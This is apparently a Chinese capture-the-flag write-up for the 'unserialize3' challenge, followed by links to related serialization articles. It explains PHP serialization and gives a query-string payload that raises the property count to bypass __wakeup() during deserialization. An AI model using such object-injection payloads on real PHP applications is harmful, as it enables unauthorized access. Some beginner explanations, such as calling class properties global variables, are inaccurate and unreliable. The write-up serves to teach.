unserialize3(php序列化、反序列化及绕过)

简介: unserialize3(php序列化、反序列化及绕过)

打开链接

审计一下代码

这里出现了一个__wakeup()函数,在进行PHP反序列化时,会先调用这个函数,但是如果序列化字符串中表示对象属性个数的值大于真实的属性个数时就会跳过__wakeup()的执行。


在php中与序列化相关的函数为:

serialize()            序列化            // 将一个类的实例(对象)序列化为字符串

unserialize()        反序列化        // 将已序列化的变量(字符串)变回原来 PHP的值


写php脚本前我们需要知道(大佬忽略,写给像我这样的小白帮助理解)


① php 源文件只能使用 <?php 和 <?= 这两种标签开头

<?php 标签通常用于纯 PHP 的脚本当中,而 <?= 通常用于模板当中


② 结尾并不是一定要加 ?>


加上之后,若?>后面还有内容,视为纯文本直接输出,直到再次碰到<?php或 <?=


若没加?>,之后的内容视为 PHP 代码,除非没有代码了


③ php中$符号的意思是变量


④ 全局变量是在所有函数外部定义的变量,拥有全局作用域,除了在函数内部不可用,全局变量可以被脚本中的任何部分访问,局部变量是在函数内部定义的变量,只能在定义它的函数内使用,局部变量会在函数调用结束时自动销毁,全局变量则在程序结束运行时才会被销毁。


⑤ php中new函数用于将对象实例化,使用方法:创建一个类、类属性、类方法,再构造一个自定义函数,通过new实例化对象,输出类的方法和功能。

class MY{               // 创建类 MY
public $my;           // 创建类属性,定义一个全局变量$my----类属性
var $xy;                 // 定义变量 $xy----类属性(var就是public的别名,用在类中定义公有属性)function CTF(){       // 构造自定义函数---类方法
 }
 }
$P=new MY();       // 实例化对象
echo $P;              // 输出类的方法和功能
了解这些后我们来看这道题的脚本
<?php
class xctf{ 
public $flag = '111'; 
public function __wakeup(){ 
exit('bad requests'); 
}
}
$Myon = new xctf();
$Myon = serialize($Myon);
echo $Myon;
?>

前半部分是题目给出的,后面就是对xctf这个类的对象实例化,赋值给一个新的变量Myon,再对它序列化并输出。



O:4:"xctf":1:{s:4:"flag";s:3:"111";}


对象类型:长度:"名字":类中变量的个数(xctf类存在1个属性):{类型:长度:"名字";类型:长度:"值";}


从结尾的代码来看,应该是想让我们给code传一个参数


构造payload :/?code=O:4:"xctf":1:{s:4:"flag";s:3:"111";}



可以看到__wakeup()函数起作用了,我们需要将xctf的参值改为2(任何大于1的数),由于与反序列化规则不符,就会反序列化失败,从而绕过__wakeup()函数。

修改payload:/?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}


目录
相关文章
|
3月前
|
存储 Java
【IO面试题 四】、介绍一下Java的序列化与反序列化
Java的序列化与反序列化允许对象通过实现Serializable接口转换成字节序列并存储或传输,之后可以通过ObjectInputStream和ObjectOutputStream的方法将这些字节序列恢复成对象。
|
1月前
|
缓存 安全 PHP
PHP中的魔术方法与对象序列化
本文将深入探讨PHP中的魔术方法,特别是与对象序列化和反序列化相关的__sleep()和__wakeup()方法。通过实例解析,帮助读者理解如何在实际应用中有效利用这些魔术方法,提高开发效率和代码质量。
|
3月前
|
存储 开发框架 .NET
解锁SqlSugar新境界:利用Serialize.Linq实现Lambda表达式灵活序列化与反序列化,赋能动态数据查询新高度!
【8月更文挑战第3天】随着软件开发复杂度提升,数据查询的灵活性变得至关重要。SqlSugar作为一款轻量级、高性能的.NET ORM框架,简化了数据库操作。但在需要跨服务共享查询逻辑时,直接传递Lambda表达式不可行。这时,Serialize.Linq库大显身手,能将Linq表达式序列化为字符串,实现在不同服务间传输查询逻辑。结合使用SqlSugar和Serialize.Linq,不仅能够保持代码清晰,还能实现复杂的动态查询逻辑,极大地增强了应用程序的灵活性和可扩展性。
127 2
|
1天前
|
JSON 数据格式 索引
Python中序列化/反序列化JSON格式的数据
【11月更文挑战第4天】本文介绍了 Python 中使用 `json` 模块进行序列化和反序列化的操作。序列化是指将 Python 对象(如字典、列表)转换为 JSON 字符串,主要使用 `json.dumps` 方法。示例包括基本的字典和列表序列化,以及自定义类的序列化。反序列化则是将 JSON 字符串转换回 Python 对象,使用 `json.loads` 方法。文中还提供了具体的代码示例,展示了如何处理不同类型的 Python 对象。
|
11天前
|
存储 安全 Java
Java编程中的对象序列化与反序列化
【10月更文挑战第22天】在Java的世界里,对象序列化和反序列化是数据持久化和网络传输的关键技术。本文将带你了解如何在Java中实现对象的序列化与反序列化,并探讨其背后的原理。通过实际代码示例,我们将一步步展示如何将复杂数据结构转换为字节流,以及如何将这些字节流还原为Java对象。文章还将讨论在使用序列化时应注意的安全性问题,以确保你的应用程序既高效又安全。
|
24天前
|
存储 Java
Java编程中的对象序列化与反序列化
【10月更文挑战第9天】在Java的世界里,对象序列化是连接数据持久化与网络通信的桥梁。本文将深入探讨Java对象序列化的机制、实践方法及反序列化过程,通过代码示例揭示其背后的原理。从基础概念到高级应用,我们将一步步揭开序列化技术的神秘面纱,让读者能够掌握这一强大工具,以应对数据存储和传输的挑战。
|
30天前
|
存储 安全 Java
Java编程中的对象序列化与反序列化
【10月更文挑战第3天】在Java编程的世界里,对象序列化与反序列化是实现数据持久化和网络传输的关键技术。本文将深入探讨Java序列化的原理、应用场景以及如何通过代码示例实现对象的序列化与反序列化过程。从基础概念到实践操作,我们将一步步揭示这一技术的魅力所在。
|
11天前
|
存储 缓存 NoSQL
一篇搞懂!Java对象序列化与反序列化的底层逻辑
本文介绍了Java中的序列化与反序列化,包括基本概念、应用场景、实现方式及注意事项。序列化是将对象转换为字节流,便于存储和传输;反序列化则是将字节流还原为对象。文中详细讲解了实现序列化的步骤,以及常见的反序列化失败原因和最佳实践。通过实例和代码示例,帮助读者更好地理解和应用这一重要技术。
8 0
|
2月前
|
存储 XML JSON
用示例说明序列化和反序列化
用示例说明序列化和反序列化
|
2月前
|
JSON fastjson Java
niubility!即使JavaBean没有默认无参构造器,fastjson也可以反序列化。- - - - 阿里Fastjson反序列化源码分析
本文详细分析了 Fastjson 反序列化对象的源码(版本 fastjson-1.2.60),揭示了即使 JavaBean 沲有默认无参构造器,Fastjson 仍能正常反序列化的技术内幕。文章通过案例展示了 Fastjson 在不同构造器情况下的行为,并深入探讨了 `ParserConfig#getDeserializer` 方法的核心逻辑。此外,还介绍了 ASM 字节码技术的应用及其在反序列化过程中的角色。
67 10